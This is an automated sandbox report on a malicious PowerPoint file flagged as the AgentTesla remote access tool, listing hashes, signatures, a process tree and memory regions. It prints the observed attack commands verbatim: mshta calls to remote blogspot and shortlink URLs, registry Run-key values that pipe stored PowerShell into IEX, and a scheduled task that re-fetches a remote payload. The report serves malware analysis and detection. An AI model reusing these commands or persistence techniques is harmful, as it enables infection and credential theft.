Resubmissions
- 25-02-2021 00:21  210225-efba8ycx12  10
Analysis
- max time kernel: 86s
- max time network: 147s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 25-02-2021 00:21
Static task: static1
Behavioral task: behavioral1
- Sample: DOC.ppt
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: DOC.ppt
- Resource: win10v20201028
General
- Target: DOC.ppt
- Size: 141KB
- MD5: 53f09cdb89620ee0d02c006d5bdf758f
- SHA1: caf1ff6f5563d23eac7c547f2309c0608ae3029f
- SHA256: a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca
- SHA512: 60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94
Malware Config
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.

- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes (description | pid | pid_target | process | target process):
    Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2144 | 4716 | mSHtA.exe | POWERPNT.EXE
    Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 3984 | 4716 | ping.exe | POWERPNT.EXE

- AgentTesla Payload (2 IoCs)
  Processes (resource | yara_rule):
    behavioral2/memory/4752-60-0x0000000000400000-0x000000000043E000-memory.dmp | family_agenttesla
    behavioral2/memory/4752-61-0x00000000004382DE-mapping.dmp | family_agenttesla

- Blocklisted process makes network request (9 IoCs)
  Processes (flow | pid | process):
    35 | 2144 | mSHtA.exe
    37 | 2144 | mSHtA.exe
    39 | 2144 | mSHtA.exe
    41 | 2144 | mSHtA.exe
    43 | 2144 | mSHtA.exe
    45 | 2144 | mSHtA.exe
    49 | 2144 | mSHtA.exe
    50 | 2144 | mSHtA.exe
    55 | 2808 | Powershell.exe

- Adds Run key to start application (2 TTPs, 6 IoCs)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).btfee)|IEX\"\", 0 : window.close\")" | mSHtA.exe
    Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run | mSHtA.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\rednufed = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).Defunder)|IEX\"\", 0 : window.close\")" | mSHtA.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\phulihoja = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).cutona)|IEX\"\", 0 : window.close\")" | mSHtA.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@titupatiyannala-myrynaal.blogspot.com/p/266.html\"\", 0 : window.close\")" | mSHtA.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"mshta http://1230948%1230948@papagunnakjllidmc.blogspot.com/p/266.html\"\", 0 : window.close\")" | mSHtA.exe

- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description | pid | process | target process):
    PID 2808 set thread context of 4752 | 2808 | Powershell.exe | aspnet_compiler.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

- Program crash (1 IoCs)
  Processes (pid | pid_target | process | target process):
    4708 | 2144 | WerFault.exe | mSHtA.exe

- Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | winword.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | winword.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winword.exe
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE

- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

- Enumerates system info in registry (2 TTPs, 6 IoCs)
  Processes (description | ioc | process):
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
    Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | winword.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | winword.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | winword.exe

- Kills process with taskkill (2 IoCs)
  Processes (pid | process):
    2728 | taskkill.exe
    3100 | taskkill.exe

- Runs ping.exe (1 TTPs, 1 IoCs)

- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes (pid | process):
    4716 | POWERPNT.EXE
    3252 | winword.exe

- Suspicious behavior: EnumeratesProcesses (26 IoCs)
  Processes (pid | process | count):
    4708 | WerFault.exe | 16
    2928 | Powershell.exe | 3
    2808 | Powershell.exe | 5
    4752 | aspnet_compiler.exe | 2

- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 2728 | taskkill.exe
    Token: SeDebugPrivilege | 3100 | taskkill.exe
    Token: SeDebugPrivilege | 4708 | WerFault.exe
    Token: SeDebugPrivilege | 2928 | Powershell.exe
    Token: SeDebugPrivilege | 2808 | Powershell.exe
    Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (21 entries) | 2808 | Powershell.exe
    Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (21 entries) | 2928 | Powershell.exe
    Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege (17 entries) | 2928 | Powershell.exe

- Suspicious use of SetWindowsHookEx (6 IoCs)
  Processes (pid | process | count):
    4716 | POWERPNT.EXE | 3
    3252 | winword.exe | 3

- Suspicious use of WriteProcessMemory (29 IoCs)
  Processes (description | pid | process | target process | count):
    PID 4716 wrote to memory of 2144 | 4716 | POWERPNT.EXE | mSHtA.exe | 2
    PID 4716 wrote to memory of 3984 | 4716 | POWERPNT.EXE | ping.exe | 2
    PID 4716 wrote to memory of 3252 | 4716 | POWERPNT.EXE | winword.exe | 2
    PID 2144 wrote to memory of 2748 | 2144 | mSHtA.exe | schtasks.exe | 2
    PID 2144 wrote to memory of 2728 | 2144 | mSHtA.exe | taskkill.exe | 2
    PID 2144 wrote to memory of 2928 | 2144 | mSHtA.exe | Powershell.exe | 3
    PID 2144 wrote to memory of 2808 | 2144 | mSHtA.exe | Powershell.exe | 3
    PID 2144 wrote to memory of 3100 | 2144 | mSHtA.exe | taskkill.exe | 2
    PID 2808 wrote to memory of 4848 | 2808 | Powershell.exe | aspnet_compiler.exe | 3
    PID 2808 wrote to memory of 4752 | 2808 | Powershell.exe | aspnet_compiler.exe | 8
Processes
- C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\DOC.ppt" /ou ""
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\mSHtA.exe
    Command line: mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand
    Signatures: Process spawned unexpected child process; Blocklisted process makes network request; Adds Run key to start application; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/266.html""\"", 0 : window.close"\")
      Signatures: Creates scheduled task(s)
    - C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
      Command line: "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
      Signatures: Blocklisted process makes network request; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        Signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
      Command line: "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\WerFault.exe
      Command line: C:\Windows\system32\WerFault.exe -u -p 2144 -s 3116
      Signatures: Program crash; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SYSTEM32\ping.exe
    Command line: ping
    Signatures: Process spawned unexpected child process; Runs ping.exe
  - C:\Program Files\Microsoft Office\Root\Office16\winword.exe
    Command line: winword
    Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
  MD5: c2d06c11dd1f1a8b1dedc1a311ca8cdc
  SHA1: 75c07243f9cb80a9c7aed2865f9c5192cc920e7e
  SHA256: 91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586
  SHA512: db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d
- memory/2144-7-0x0000000000000000-mapping.dmp
- memory/2728-16-0x0000000000000000-mapping.dmp
- memory/2748-15-0x0000000000000000-mapping.dmp
- memory/2808-51-0x0000000009AF0000-0x0000000009AF1000-memory.dmp (Filesize: 4KB)
- memory/2808-20-0x0000000074020000-0x000000007470E000-memory.dmp (Filesize: 6.9MB)
- memory/2808-59-0x0000000007C40000-0x0000000007C53000-memory.dmp (Filesize: 76KB)
- memory/2808-58-0x00000000043B3000-0x00000000043B4000-memory.dmp (Filesize: 4KB)
- memory/2808-53-0x000000000A130000-0x000000000A131000-memory.dmp (Filesize: 4KB)
- memory/2808-45-0x0000000008D80000-0x0000000008D81000-memory.dmp (Filesize: 4KB)
- memory/2808-18-0x0000000000000000-mapping.dmp
- memory/2808-44-0x00000000080A0000-0x00000000080A1000-memory.dmp (Filesize: 4KB)
- memory/2808-30-0x00000000043B2000-0x00000000043B3000-memory.dmp (Filesize: 4KB)
- memory/2808-28-0x00000000043B0000-0x00000000043B1000-memory.dmp (Filesize: 4KB)
- memory/2928-55-0x000000000A9D0000-0x000000000A9D1000-memory.dmp (Filesize: 4KB)
- memory/2928-35-0x0000000007360000-0x0000000007361000-memory.dmp (Filesize: 4KB)
- memory/2928-33-0x00000000072F0000-0x00000000072F1000-memory.dmp (Filesize: 4KB)
- memory/2928-23-0x0000000004500000-0x0000000004501000-memory.dmp (Filesize: 4KB)
- memory/2928-25-0x0000000006CC0000-0x0000000006CC1000-memory.dmp (Filesize: 4KB)
- memory/2928-27-0x0000000004630000-0x0000000004631000-memory.dmp (Filesize: 4KB)
- memory/2928-29-0x0000000004632000-0x0000000004633000-memory.dmp (Filesize: 4KB)
- memory/2928-37-0x00000000075B0000-0x00000000075B1000-memory.dmp (Filesize: 4KB)
- memory/2928-17-0x0000000000000000-mapping.dmp
- memory/2928-31-0x0000000006AF0000-0x0000000006AF1000-memory.dmp (Filesize: 4KB)
- memory/2928-57-0x0000000009CD0000-0x0000000009CD1000-memory.dmp (Filesize: 4KB)
- memory/2928-49-0x0000000009600000-0x0000000009601000-memory.dmp (Filesize: 4KB)
- memory/2928-47-0x00000000098B0000-0x00000000098B1000-memory.dmp (Filesize: 4KB)
- memory/2928-40-0x0000000007960000-0x0000000007961000-memory.dmp (Filesize: 4KB)
- memory/2928-41-0x0000000007DF0000-0x0000000007DF1000-memory.dmp (Filesize: 4KB)
- memory/2928-21-0x0000000074020000-0x000000007470E000-memory.dmp (Filesize: 6.9MB)
- memory/3100-19-0x0000000000000000-mapping.dmp
- memory/3252-9-0x0000000000000000-mapping.dmp
- memory/3252-13-0x00007FF9871A0000-0x00007FF9877D7000-memory.dmp (Filesize: 6.2MB)
- memory/3984-8-0x0000000000000000-mapping.dmp
- memory/4708-22-0x000002566FD20000-0x000002566FD21000-memory.dmp (Filesize: 4KB)
- memory/4716-4-0x00007FF965210000-0x00007FF965220000-memory.dmp (Filesize: 64KB)
- memory/4716-6-0x00007FF965210000-0x00007FF965220000-memory.dmp (Filesize: 64KB)
- memory/4716-2-0x00007FF965210000-0x00007FF965220000-memory.dmp (Filesize: 64KB)
- memory/4716-5-0x00007FF9871A0000-0x00007FF9877D7000-memory.dmp (Filesize: 6.2MB)
- memory/4716-3-0x00007FF965210000-0x00007FF965220000-memory.dmp (Filesize: 64KB)
- memory/4752-60-0x0000000000400000-0x000000000043E000-memory.dmp (Filesize: 248KB)
- memory/4752-61-0x00000000004382DE-mapping.dmp
- memory/4752-62-0x0000000074020000-0x000000007470E000-memory.dmp (Filesize: 6.9MB)
- memory/4752-66-0x0000000005330000-0x0000000005331000-memory.dmp (Filesize: 4KB)
- memory/4752-68-0x0000000005240000-0x0000000005241000-memory.dmp (Filesize: 4KB)
- memory/4752-69-0x00000000057F0000-0x00000000057F1000-memory.dmp (Filesize: 4KB)